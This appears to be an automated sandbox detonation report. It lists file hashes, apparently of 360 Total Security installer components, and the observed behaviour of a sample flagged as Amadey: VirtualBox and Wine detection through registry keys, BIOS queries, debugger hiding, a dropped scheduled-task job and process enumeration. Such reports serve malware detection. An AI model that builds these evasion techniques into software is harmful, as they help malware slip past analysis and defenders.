| SHA1 | 5925a1f3a265311e8d818407062ddf5cefffac3f |
| SHA256 | 81399a7379aebbbfbce8d8cbc2d482ca04c38ddc91919ae5c6ee3a0f8fb3ea9b |
| SHA512 | 7da2f2550b4bcad5a5df5033c44635722724ed68fe97fa9e383032432283ac43e3dbeb0f4080368f86d2e2b54b91a166f5e6280c35f0ae7e8af3e31c478fb48d |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\360DeskAna64.exe
| MD5 | 4b26b4b4f38fee644baccefc81716c6c |
| SHA1 | 6036d5f882e7e189859e58fbbd4421a2b09b58dc |
| SHA256 | 48b9596b3c7b1af2c0c5cd62a815f7e43deac03ae3e91da26e8dec2891c915be |
| SHA512 | 76d2235e29a906c8973374d2ec3cb549222d431695daf6ceda2aaeee95fd5bb35dd57d53a73d9a7be04fe38d10f81eee398bb81bf3c104bd0fc17e871d081a60 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\Utils\DesktopPlus\DesktopPlus.exe
| MD5 | 7186838bec4478b234b432d264658f10 |
| SHA1 | 5ce0f57d2d176e89fd345caa30e1f0de0f63e24f |
| SHA256 | e2fa4a52ffbec327e8678fb584cd6573c7966737251e6aa3cad113d63c3ca0e3 |
| SHA512 | 6f1ba31675177c0aae4bc9cc65690b9f52abe2292173d7a12bf8816ada6593b9546dcb7e27ccec4b592ed42cad785e0572a8b4dbff2978c1d7d0dc0f5cdd9d3b |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\Utils\DesktopPlus\DesktopPlus64.exe
| MD5 | addb69f9a976b47243ed7c621c7e5c10 |
| SHA1 | 6f0d78c32984b7dc764df183b76802f2c2203a11 |
| SHA256 | 40920438eb1b105449b565d669cbc7f74a7c8499a1ebdc683bbf62499c222a5f |
| SHA512 | 4aba4c7ff23371d667506da3a2d0c9bbc165070f7e2a66341b27eece3301c3c1723f96850d8266859c144932232ca1b4de1057883ca0cfd9de026a492344c953 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\Dumpuper.exe
| MD5 | bf7d946721599d16e0fa7ef49a4e0ee4 |
| SHA1 | 74c6404d63ab52aad2e549b8d9061ee2c350ac5a |
| SHA256 | 5f21575642ecf7d38be30aef50be623f74dc3644603e0cb48d1b297ae2066614 |
| SHA512 | dd8b5e8233033a3ddb30278b2b82c60925bbca63edb68aa1e23c0a6a8f0dd8da21f60846c747fea83be7ed1e99ed86379ffff7b6aefde5ffbb85e3f98732725f |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\360Base64.dll
| MD5 | 115ba98b5abe21c4a9124dda8995d834 |
| SHA1 | 5dd5cae213a9dbe5ea7729c1d2acd080f75cfa39 |
| SHA256 | 80765adb886050b0f87e30fa62336985db67c09b25f4d1760194a28ff78899d7 |
| SHA512 | 1c415c07dd59ef00c7bdcef35ac8fdeea88b6f482d266cc12bab3d4d3005a76eebbe97d06e5282e1dbe940ab2971ffdcbd0db2cd1d700c33805cf1831efe1a3d |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\sweeper\360FastFind.dll
| MD5 | 05a04412b0a86f848eb92a97e81f3821 |
| SHA1 | a6495836bb9915eec2c559077a44861d2c5c8182 |
| SHA256 | 45a9d2180bc3a6c5716a5ccbf74b14d9e91fa706449aae4046c0835cc672f5e5 |
| SHA512 | 9074ac8882bcecafe4726ebe9625b57ec4410cc2f9a8293462287c76f0904b1b9d4ac181edd99a3e525a36b307497b3242390fe19d41ed2420b3d70682e67244 |
C:\Program Files (x86)\360\Total Security\360NetBase.dll
| MD5 | 14c6b4bbd31f6fd13530bc941cc71d1a |
| SHA1 | ce4e38ac82a54f64d318507ddc28f9ffbb378f0f |
| SHA256 | 401d8529a84f1d80a439be8cd4e869202162458e5afb5e5bac97c4859bfe8eb5 |
| SHA512 | c16d525f1d3fc098b4d6c8b8a872a9013ef2f945f27af73ed7826f61a2b80d756ae5348105432909eccc71f03834cd1301f87fa5a0107e0c7137f5c8e3a3cc95 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\360NetBase64.dll
| MD5 | 869470ff4d2d3dffc2ef004a208fa4ac |
| SHA1 | 98b2e5b7240567b046b47021e98c84702a39347a |
| SHA256 | ab52fff1840b010a1e6be5e432c44ca0aa2857d5da3df6574fc0fbc0004edc7a |
| SHA512 | f7994f656fc52d5c9ff24d7746d7b36da6a749bdfeb06a24b17cb762e50bff1fbc9f4ae3e4ec884b81776905c870e70cd8fe326b2f3d21a3d1a866b274f369e2 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\360TSCommon.dll
| MD5 | fd9ec3f6ae3ec4e72c7d8adb9d977480 |
| SHA1 | 304b83eb514354a86c9b136ac32badcec616fed8 |
| SHA256 | deddae3c60a724e167107cda7d4ad0481d8ab451f61081eff7730d0f114da918 |
| SHA512 | 22a47674c2000c175594e8b9f95d23665481a2f2c84f8870a4ad58095aa107b9a0ba61a5315ebdfcd1ec6a4b3031bb3e21ee6e2624d57daae20c587592cce5fd |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\360TSCommon64.dll
| MD5 | 40e115b8b079bead649964fccab4b2a8 |
| SHA1 | e2a80de5244ebf4007de8a74cd0003055ce87656 |
| SHA256 | a4a6473251bcfff7944d7b23f823dfdcb150a7353b1f2a54e20a3e2fbaf03e07 |
| SHA512 | b73cc36bc808ce2c1c3280205bf848a51faefe07671cf8a6e6bb7e91fa26522069a82ddee3fbf68a3e89318b1ba0a8784b1a4efce9d163c606033e78919b2db4 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\360Util.dll
| MD5 | d9a8493f1ce7b60653f7fb2068514eff |
| SHA1 | c8c0da14efeb1a597c77566beed299146e6c6167 |
| SHA256 | 77cee2e41fad67986c6c6e1426bc6bdaa976b1dcd3b24f381376b201d201581c |
| SHA512 | 0b500630e13aefba621c0f66aef5f2528c0fa0c91deaf19e92999c6377908f53f3a6b23fb90723b890155877ab7b8b40eacd851794b23ff213cc33013734415f |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\360Util64.dll
| MD5 | 8b14a80d926ffdab593b6bc0b002b9c4 |
| SHA1 | c84c938543ef6d2c42ad0c61f970e3d1ccb3be44 |
| SHA256 | 669a13733ce62edac298f91f957ebc7c748918d07c7730e94fd930d6141f8078 |
| SHA512 | d049f415db5dc5c38a968251e72930a8a90e126617f514b0566f203435ab8f1e96371c2c8f0f40cc60dbcd48b284bf46369d377eb4fa61e4fec6def054bbb744 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\CrashReport64.dll
| MD5 | f0ec259bc74b69cac5789922187418b5 |
| SHA1 | 99e738a12db4a60ee76316ad0a56604a5f426221 |
| SHA256 | 09eafeda04f79fd1faf273efe104e877b719fb31689838aa12a3e6d3384a3da4 |
| SHA512 | 630cf0a30961af6d41d24f2d2fc81e0c10c99e19241aff7e14aa38317eebbe01e5d85c1cb5848ecfd7b75e2fe762cf4a07fee781d052b48f0a3c15a37505dac4 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\CrashReport.dll
| MD5 | 94a08d898c2029877e752203a477d22f |
| SHA1 | d8a4c261b94319b4707ee201878658424e554f36 |
| SHA256 | 07ed1d3443e7f9b2531aaa0b957a298ea6c5c81bcd321e7faf25a17a85063169 |
| SHA512 | 79a2e121665e403767e5278bdbac6c52f6ce048d0c3968a2fb5053229c5d98e9275acbc48806c45b8bc2e807f6e52ee4dad54924b758db8328fb262c6fd176b6 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\MenuEx.dll
| MD5 | 273c2d00588d203a9f1486cabacc7c57 |
| SHA1 | cd7782e5836d645b2244bf30fe91c79fdcfc86d2 |
| SHA256 | d14d7de52c5749549a17e7614bd3df8278e8595ffca4110e6289c56a21eea6dc |
| SHA512 | 6cf37c151a21447ac35638af22f6324ed0c10df736e5e54be279b5db8f68da86d85ef6fdfa3b4a22b2ccecd98dd37abdc93b9e8f391a3a90deb1e4e4990c1779 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\MenuEx64.dll
| MD5 | d569954dc1054b6e7d3b495782634034 |
| SHA1 | dfaf57da05704261aa54afaa658d4e61a64fa7f2 |
| SHA256 | 11294e063fe9a5d5b6019a39b48bebb75f536e27ff92008c85e9357c95805b80 |
| SHA512 | b12e2a6cfe849b5df21295f4a538db0381f2fb8c63b8b4dfca9778af16c68d23336140874a64deb324e39da0ac52b1f2292812fd02967d415319ade1ee965b6e |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\sites.dll
| MD5 | d43fa5904a62445893fe1db320ff2e7b |
| SHA1 | 2f888949e9c3ce0f647b97ebc8289ae3f2f2eaae |
| SHA256 | 074f19878542b07060bcf7a10238aac2571eda75f6596fed6a0a1f7e884f2305 |
| SHA512 | 1589551e1b5f2c8794f56543eb472c1a801f6dd6b338ffe406bf91bf39061a9022fe13c9a460589a42f243f5329193ff2ae32b1112252fc78d0321c68313b34c |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\Sites64.dll
| MD5 | 4bd489f48461de0098f046eeb0fcfb1e |
| SHA1 | 047c39f1b52602eb19655c4ce42d67e8aaabeb9a |
| SHA256 | e751410539c790554ef7e3f198689b61ed06955a608dc1fcb392bb4b7fe522c6 |
| SHA512 | a97929d19b9fba341bc52bb96eea0c97a952f3ed2e6cf233cef9b38b3fd678f0b85c1703fe4c0d6f9c6ca3e6577716e564f92e9b36f7806ae0f5dc3c15f9caa8 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\ipc\360Box.sys
| MD5 | feb5d9ad5a6965849756344f9947a772 |
| SHA1 | 5e24761e4e5b7d6c116c0146ded4851db55c8f7e |
| SHA256 | f3f3faa4a6ba4e81271e25e99badf4318b84637784d563a84a017c5f46ce291e |
| SHA512 | 3110f5a76e5967942348bb13a669ff03c21beb9c62405c552b530eec8060a9b304d76f990ff8c4cecf67a4d1f66e6a32a7388a951036fa641fa98679c302b9a0 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\deepscan\BAPIDRV64.sys
| MD5 | 992de18c7b0d80d7b8531b90c3910888 |
| SHA1 | 173c5c2afa64ce8b8d2243b5baa5d4a77c996e17 |
| SHA256 | edde2232716629c09ebbf6a5ddfe55fc8bc2edef91ccede9104b3186ffb170a0 |
| SHA512 | 98346c390d9b64360c70b7c5780efb62e856f03e19d58fff433461cf5a2d833fea847267db1b72cf4103e9270f56b11ec542b15fc46e4a01233b8327a6878936 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\safemon\WscReg.exe
| MD5 | c7dbfd0d17929c83f12080eb4680595f |
| SHA1 | 210f608a7929bf4085815522ffe2695063125e69 |
| SHA256 | a628b37df526093026862a1180484beece436b5dfba83648551fe57ce9a5dd75 |
| SHA512 | 7d8d5b387cf65920e7a1f2aa7c0ce111eb5d600fe69ec48c66f3bf05c870dad0e34d9637b1852af0f379495bc3ebc277d130d14701e2b4114f8d50bab057c5f3 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\deepscan\dsark64.sys
| MD5 | b498f27ca312db96a0cbe6b7405b2027 |
| SHA1 | d35c9e5bcb3df23855130b783ea80fea8653a097 |
| SHA256 | 34257623c1c563abf99085b4c483a672945bd6059009eb001266f003f315b356 |
| SHA512 | 42d6315047d76b43bd2187f45c2f68182fa2b0e803be8989417e8637c1172391d00c0b3a9b6227852bd4d31a72a661a19e074e163ef04ba2e031b2b4df942586 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\deepscan\BAPIDRV.sys
| MD5 | b7b91b32156973711fdba826e2fed780 |
| SHA1 | 0caaa4c4b12801ea1dcfbc9bb46b5cc49cf74c2d |
| SHA256 | 2d7fa3af97a50240dec7540e4171772912d1dbb82259ac4acf039818417cde5d |
| SHA512 | 8ad87c80012fe9645514df956a22aee79749feac87b199c4a89f030544a49bd5c51148df02885a794d20056bef6091947c3bb61dfe60bcabad71e3969a249967 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\ipc\360hvm64.sys
| MD5 | 37ef2ad85bca66cf21af216ab4e35707 |
| SHA1 | 1569cb84354ed47f97844833807ed5a07dc5df92 |
| SHA256 | 77faaf6c67ab95db1615275410d2dd611208fce0e80771bd009cf0f8f98cf74e |
| SHA512 | e2b85223b86b8c339a2794f3e30f601c877107c5a7555ea33c173e6a79c3626a623283249d8a62fb405fdfd54ec4ebc802977d74533d8fe3ef41fd97d231b035 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\deepscan\360FsFlt.sys
| MD5 | b372e31c719a47b08fe4d377d5df4bde |
| SHA1 | ea936fa64b8d11fa41825f07c2ceeb886804956c |
| SHA256 | 8d21a430b38d74157f5d73f8dfd4d508c2fff7f2945fa2987794f656b3acb58c |
| SHA512 | fc2962127bb84aff61239fefc060c002edb6560e11a5e7d2d0dd6d15a431200eb5ac988867988ddd84fd5da241f6bc4a1319ffa83cc9ce7d5691e7e5c4170625 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\filemon\360avflt64.sys
| MD5 | 12426837392e278838d1501a5f324398 |
| SHA1 | 3be22df43e2bce3690c92188a76fa33a8a581d69 |
| SHA256 | 4fb3cfbf91bc27e867d8f58081ffd3be361481e2270627825cdfd13eef50ec1d |
| SHA512 | 28ced26c8acbe9177ff01fb24d7a8abb34f37a0748824508f86a75b162f17371f02318eeae4f27ed183143a22af01c57d074f3b444621209d573aa323071c7f3 |
C:\Users\Admin\AppData\Local\Temp\360_install_20240530162319_259528770\temp_files\filemon\360AvFlt.sys
| MD5 | 86d92ff1f211f9704d0a5ee744dc5c5e |
| SHA1 | 21120d96da72b7a592dfdbe918e2dd8656f0cd2d |
| SHA256 | 79eb282821aa728f0fdfdb07a1fba273af83768614e026bc8e371655e398bd50 |
| SHA512 | b547eaa0b43ccf1af913c94ac7831edaf45d15428fd017d8f41cb8942156a453c381d4526a0b51f343093f854b4c5fdb716bdaa366101ce652cdeeb83f5de2c9 |
C:\Program Files (x86)\360\Total Security\filemon\AVCheck.dll
| MD5 | 0fc2f13d9e0cfbd4903a77051348d16a |
| SHA1 | c1df2fe56cbd15271020e48751c39ab482f6eaca |
| SHA256 | 7b79ca1ec9ea05d6549218af8c646f8cb25c563e66d810ca8890340066cff72b |
| SHA512 | 6977514116a2fa2c0a884b46975cfa048d966448e493c1415467d6be8719c6b40db0181a861f9e0ef53aa90a3b04012e02e6aecb70230745c487355170416efc |
C:\Program Files (x86)\360\Total Security\filemon\AVLib.dat
| MD5 | e3bcd970502ec0d7ebb03bfb2c4a3bab |
| SHA1 | 5da1058a0be57b048a2c1b3442de44c576a4c913 |
| SHA256 | 2265a0b291d07eed46ff162f10dda492aa62aed8ea8b5b6146cc995e15dcbab6 |
| SHA512 | b5fabe8a300baf6b3535d19091438aa7ce647db286642c9e1a8635fc11ecf488eb6f2b5734a01a3072fe5fd7a16185d2272a51f657a4bd78c0ab8fff9516709b |
C:\Program Files (x86)\360\Total Security\ipc\360Box64_old.sys
| MD5 | 69c04d5da61c59c89bbd36cbaa13e9ae |
| SHA1 | 0369967f432d623a1fad7c5c1a7405104faaba44 |
| SHA256 | 23283e2c2bd6ccb04436c90037282dd103bc8add9bc62e9f5d34842e2e336b11 |
| SHA512 | 3bfabad5b72eea44af705a3c482e7496e6a1547e0ddd429740a6d69e81895a651c87ea3ce6b53ad0ab6f2df331516ea80bf1ae47b02d6becb01e4d9f51ae4024 |
C:\Program Files (x86)\360\Total Security\deepscan\360FsFlt_old.sys
| MD5 | cd20d1dd4eab42c47d1ded235f97329f |
| SHA1 | a4a21345c840854e3798a008d244db53217e42d7 |
| SHA256 | 4df4e20bd4062e8971d85e8145b0b91b60922ec9f007702ba2b81d08029ba8e3 |
| SHA512 | 67ca599dda7c69fb1220265e913b5b6456c36a67f148e7d58fb7c78e20afad92ca4e628ee9e484de91235c898e855d96edb93ad186099753317585fc20e3c01e |
C:\Program Files (x86)\360\Total Security\deepscan\BAPIDRV64_old.sys
| MD5 | 92250774eb2f9dd1316fc5dca5a1d375 |
| SHA1 | df62deaf0a9eacdd74b6ab1c03767a4cb7af9221 |
| SHA256 | 6edb05bc886e30adba4164cc852eb089630d936f106a5a29f4d30727f1a6535a |
| SHA512 | bf68a4955cc09d20380736bb78b16f15ac85a6beb6af5065a640d7545707f573a17a5aa0f6664a2b8f2cd7bf0cceb186f885210c8a07fc5d185c030d01793fd1 |
C:\Program Files (x86)\360\Total Security\i18n\en\UrlSettings.dll.locale
| MD5 | 627cbb9d1671cd7a553cb9e59e765bbf |
| SHA1 | 4a4916f14c4ca7d26dac88ff4a5884761d8c5a70 |
| SHA256 | 063e660b1e32cbaefb8b928f1fa638853bbcb6b996bb08496fc861fc5425a840 |
| SHA512 | cfe0246353d9670ac7d77994633e8c55aca4a3ecc889c52d09949e427d5e5e06056678de15ecc3017af81ca6ca1333f624f8652a7488dd4e317c6a46c8719237 |
C:\Program Files (x86)\360\Total Security\ipc\DrvUtility.dll
| MD5 | bc8917f469a0e356c015ad6a31acc134 |
| SHA1 | a2e0fbcff53018ed92754065beb0a16e35339cf3 |
| SHA256 | 4f798cf1e27dd355709c4ebe11a24b17ee832b4051f8952d9ae12942e0ccc5a9 |
| SHA512 | f9039ea609c18174dd76f5a89b6af4908573fe194cfaf412430c755da0626dce7b92f668e5cac6b195c91f17cc4eaf4ddb963b95bc6de7483c05436f7f4f59c8 |
C:\Program Files (x86)\360\Total Security\ipc\360Camera64.sys
| MD5 | d85dac07f93d74f073729b89dc339251 |
| SHA1 | e628f85f1365d9164140391cb93a2b22a4fb8ba4 |
| SHA256 | 5b64447141ffe714f04a4ae489dac020b5ca0c31011c8edcc22da8cbfe265256 |
| SHA512 | 896aeee641e5ad5df74c16ae8bed9c0f9ef53034c391b47e5c99540a3da58bbae9524f0bcebfa93f395b7b6e6a0ad1100e27f19d05c796abb1da6660a3b35da2 |
C:\Program Files (x86)\360\Total Security\I18N.dll
| MD5 | 7e181b91215ae31b6717926501093bc4 |
| SHA1 | 8fcf05c9ac64c46c87acc1ec67631e7b66363d9e |
| SHA256 | 239824a487ae786daadc9e556c185561378f47ec7ba6b216c17242aea3a78ff9 |
| SHA512 | 0df684bdd9c0a5cce81db692e336dcf3e8c8aec80d5d6fb8620227e2f31d5bfd1d63f9cb7f808cb9511fe483e7798fa6d5a51c0bb1ec3c3c86400767a17a155f |
C:\Program Files (x86)\360\Total Security\QHVer.dll
| MD5 | 63a88250295528135e6ee41b0cbc255f |
| SHA1 | 15f146685c055360346e47e892f96238e6173489 |
| SHA256 | 0463ad6297e656bbb54e5d0708563fd535019c79bc0520d727a9f8141e519d90 |
| SHA512 | eb6cba7d91ddc343c7e57479c6b17baa046a0263cbc7945dd1bedd0c39f2240bf38528c45b253e149fd628465ac3fecf29ab3ff3c1932d856ffcd0ee842c2cdd |
C:\Program Files (x86)\360\Total Security\filemon\360avflt64_old.sys
| MD5 | f14d2b6d2d2028ca0851a604cd69c408 |
| SHA1 | 54fb598af2f9ec109973085322e5b79254856560 |
| SHA256 | 167b31798b2bec91bb60eb64f50300a0c5e1605203349817754c6be161a84539 |
| SHA512 | 9dda7ba6c320f7dec35bb118c792fa6c56ec5c32610f7d93776f4bbb0a031be5a7394cbe8931608faece0a855a26e927b2ffffcdb005be6751e07add4f19b49b |
C:\Program Files (x86)\360\Total Security\filemon\360AvFlt_old.sys
| MD5 | e855e9039f37523e6b01e05107cefeff |
| SHA1 | c0882da58826de9fb9bc95c929a73fb71735fd78 |
| SHA256 | 3b81711731e79ea45c3545b599f3ebc21ced95f608694332892c918e6b2faa17 |
| SHA512 | c3c56ec6a31f9c0a49b195b2e503659c61b47cf556747ebaffe6fb9f8880a8bebae84ba12a749ad0191087bd3e843ed99c1ec74f51744a3743705dbf46c9c325 |
C:\Program Files (x86)\360\Total Security\deepscan\dsark64_old.sys
| MD5 | a4c68afa8fca59190ab429ae631399fd |
| SHA1 | 2a4e3d62661e564468e4dfb99761de099434e3e5 |
| SHA256 | 11be27f2ba0af548e2fd5ad7baaa5ac3e10b928b0742680ab9f673d1ebf31521 |
| SHA512 | 2e3d5381649b8cb97179751963b572ff4f828d581b1e87df0cedf5ed51f76235db0ba4e78087562ac6f9f02f805b9ecafdba53a1b4572363829211643d4f8fef |
C:\Program Files (x86)\360\Total Security\deepscan\BAPIDRV_old.sys
| MD5 | 98ee79b8e82c1da453c71a6f9380d128 |
| SHA1 | 7e9178bab13a14b4b5567994ada35d13fdb2b1be |
| SHA256 | dc346a2acb7a340a3ebfec2ac684254defb66f5485726d0ef32b51a3247fab83 |
| SHA512 | 60b4b163a4579af0e39f594b1fafdfca09cd7cb99c598cc708e841be3ac13ca56d1c6c2a760119060f82191e26819e6028ca4bd76cc25008a476f6b24e11acfc |
C:\Program Files (x86)\360\Total Security\ipc\360hvm64_old.sys
| MD5 | f93fa692aa3658422997643f51c1b7d8 |
| SHA1 | d00ddf850a7f937d1a75c401227a70fd80718171 |
| SHA256 | 3c9da5ab28427405bf1099c1e7c3e77683c658c0c7c5fc458f606f368e7c6fc6 |
| SHA512 | b30b87b49f0155f2e310730a71e39de041b74d2aab53215089fc61be700854d5576c540eca34da774c358fd89e516204be14519576e2946a05b1f90318659745 |
C:\Program Files (x86)\360\Total Security\ipc\360Box_old.sys
| MD5 | df38750f3f3e205e8795724d970189ea |
| SHA1 | 442952863db2e6466ec9ca116b1ce85876100a89 |
| SHA256 | 5d90f8287ad1ccbc6e6c3c656b1a84467c50801590d8f730c10b0d106532294c |
| SHA512 | 9311928c6193f11ba3778b546e0081062998b9da4356529a341971cb343af0adeaef8e4099adcf4dc8905b68dbe8cf86d43cbb2690d64d328c21631803540b4c |
C:\Program Files (x86)\360\Total Security\360rcbase.dat
| MD5 | fae24f818a5721a020be0c6cccde118c |
| SHA1 | 8480eab0734e8a3401666dfb9afc392a253338da |
| SHA256 | 01d6c6cdae2f16aa0f502b6c03e2db4b21b56b55599f2223e3eea2b6129ca17c |
| SHA512 | f9ec5f1d81981410592a2b77be30eb40bb7b9f1702368bad69ed8535999b496a604fb522af4cbc8eb840049a7cc814ce96d5e4e979b4335e396503a93fbe53c2 |
C:\Program Files (x86)\360\Total Security\ipc\360AntiHacker64.sys
| MD5 | 0e93f09b4e51c6a8a66cd1c9ceeb8ff3 |
| SHA1 | b868b7f8fd150cdd3b5d569738154e62350aef5c |
| SHA256 | 66152d1316b674a95ee0bd63844e6acb5a709a177934814aede80166bf2bc204 |
| SHA512 | c5b9f574d83f81b58147056f94ba82deca63195a2454db6f5196057e91d3e7fac15c94951c4e7bb14d3f2aeb2a2eec4230594646c27280abab58df3f9e4ef239 |
C:\Program Files (x86)\360\Total Security\filemon\360AvFlt.dll
| MD5 | da5e35c6395a34acaa5a0eb9b71ff85a |
| SHA1 | 5da7e723aaa5859ab8f227455d80d8afa7696e22 |
| SHA256 | 5e11c25e4d6e146c5e10fcbc21b2cdb5e97ec47f25c416e5d263985f3d964172 |
| SHA512 | 49660339594abff9b0590bc3f401634a514834cf98fa8715b05a57a3cea575d74859681984d8c2c601d5fe947701f8f110450fac764a5d32096e24d7eadcdd2c |
C:\Program Files (x86)\360\Total Security\ipc\360hvm.dll
| MD5 | e540bc23b3f5934dee4d7b7b39fc3ac2 |
| SHA1 | 465f0b0e4fe49b81a43980dd0cf40e068e98abed |
| SHA256 | e794c636a50b5f51e0bd233c59c9144277a94792d3537460123a39c583d01421 |
| SHA512 | 39412ddea1f7b16ae1b6d89db7f7c24b92b1b310f3d9191ab82bfa01283044d3c4e991a5fd4efee98d00c1e65d76328bd396138e5dfc90f44ed49ed605f8e764 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-30 16:21
Reported
2024-05-30 16:23
Platform
win10v2004-20240508-en
Max time kernel
144s
Max time network
138s
Command Line
Signatures
Amadey
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\axplont.job | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
